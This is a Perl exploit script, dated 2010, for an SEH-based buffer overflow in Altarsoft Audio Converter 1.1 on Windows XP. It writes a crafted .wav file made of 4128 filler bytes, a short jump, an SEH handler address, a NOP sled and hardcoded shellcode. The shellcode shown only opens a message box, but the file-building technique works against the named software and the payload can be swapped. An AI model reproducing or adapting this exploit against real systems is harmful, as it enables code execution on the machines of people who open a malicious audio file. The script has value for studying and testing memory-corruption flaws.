Altarsoft Audio Converter 1.1 Buffer Overflow Exploit (SEH)
Source: http://www.invasao.com.br  Author: G0M3S  Published: 2010-12-17

#
#
# Exploit Title: Exploit Buffer Overflow Altarsoft Audio Converter 1.1(SEH)
# Date: 16/12/2010
# Author: C4SS!0 G0M3S
# Software Link: http://www.altarsoft.com/downloads/AltarsoftAudioConverter.exe
# Version: 111
# Tested on: WIN-XP SP3 PT-BR
# CVE: N/A
#
#
#Created By C4SS!0 G0M3S
#E-MAIL Louredo_@hotmail.com
#Home: http://www.invasao.com.br
#
#
use IO::File;

if($#ARGV != 0)
{
    sub usage
    {
        system("cls");
        system("color 4f");

        print "\r\n   ||=================================================================||\n";
        print "   ||                                                                 ||\n";
        print "   || Exploit Buffer Overflow Altarsoft Audio Converter 1.1(SEH)      ||\n";
        print "   || Created BY C4SS!0 G0M3S                                         ||\n";
        print "   || Contact Louredo_\@hotmail.com                                    ||\n";
        print "   ||                                                                 ||\n";
        print "   ||=================================================================||\n\n\n";
        print("[+]Exploit: Buffer Overflow Altarsoft Audio Converter 1.1(SEH)\n");
        print("[+]Date: 16/12/2010\n");
        print("[+]Author: C4SS!0 G0M3S\n");
        print("[+]E-mail: Louredo_\@hotmail.com\n");
        print("[+]Home: http://www.invasao.com.br\n");
        print("[+]Version: 2.1\n");
        print("[+]Impact: Hich\n");
        print("[+]Tested On: WIN-XP SP3 Virtual Box\n\n");
    }
    usage;
    print "[-]Usage: $0 <File Name>\n";
    print "[-]Exemple: $0 music.wav\n";
    exit(0);
}

$file = $ARGV[0];

$buffer = "\x41" x 4128;
$eip = pack('V',0x004FCA3F);
$nseh = "\xeb\x06\x90\x90";
$seh =  pack('V',0x0042f486);

$nops = "\x90" x 15;

#Shellcode MessageBoxA()
my $shellcode =
"\x33\xC0\x33\xC9\x33\xD2\x33\xDB\x50\x68\x6C\x6C\x20\x20\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x54\x58\xBB\x7B\x1D\x80\x7C\x50".
"\xFF\xD3\x90\x33\xD2\x52\xB9\x5E\x67\x30\xEF\x81\xC1\x11\x11\x11\x11\x51\x68\x61\x67\x65\x42\x68\x4D\x65\x73\x73\x54\x5A\x52\x50".
"\xB9\x30\xAE\x80\x7C\xFF\xD1\x33\xC9\x33\xD2\x33\xDB\x51\x68\x53\x20\x20\x20\x68\x47\x30\x4D\x33\x68\x53\x21\x30\x20\x68\x20\x43".
"\x34\x53\x68\x64\x20\x42\x79\x68\x6F\x69\x74\x65\x68\x45\x78\x70\x6C\x54\x59\x53\x68\x21\x30\x20\x20\x68\x43\x34\x53\x53\x54\x5B".
"\x6A\x40\x53\x51\x52\xFF\xD0\x33\xC0\x50\xBE\xFA\xCA\x81\x7C\xFF\xD6";

 

$payload = $buffer.$eip.$nseh.$seh.$nops.$shellcode;

open(f,">$file")or die "ERROR:\n$!\n";
print f $payload;
close(f);
usage;
print "[*]Identifying the size Shellcode\n";
print "[*]The Shellcode Size:".length($shellcode)."\n";
print "[*]Creating File $file\n";
print "[*]The File $file Created Successfully\n";


 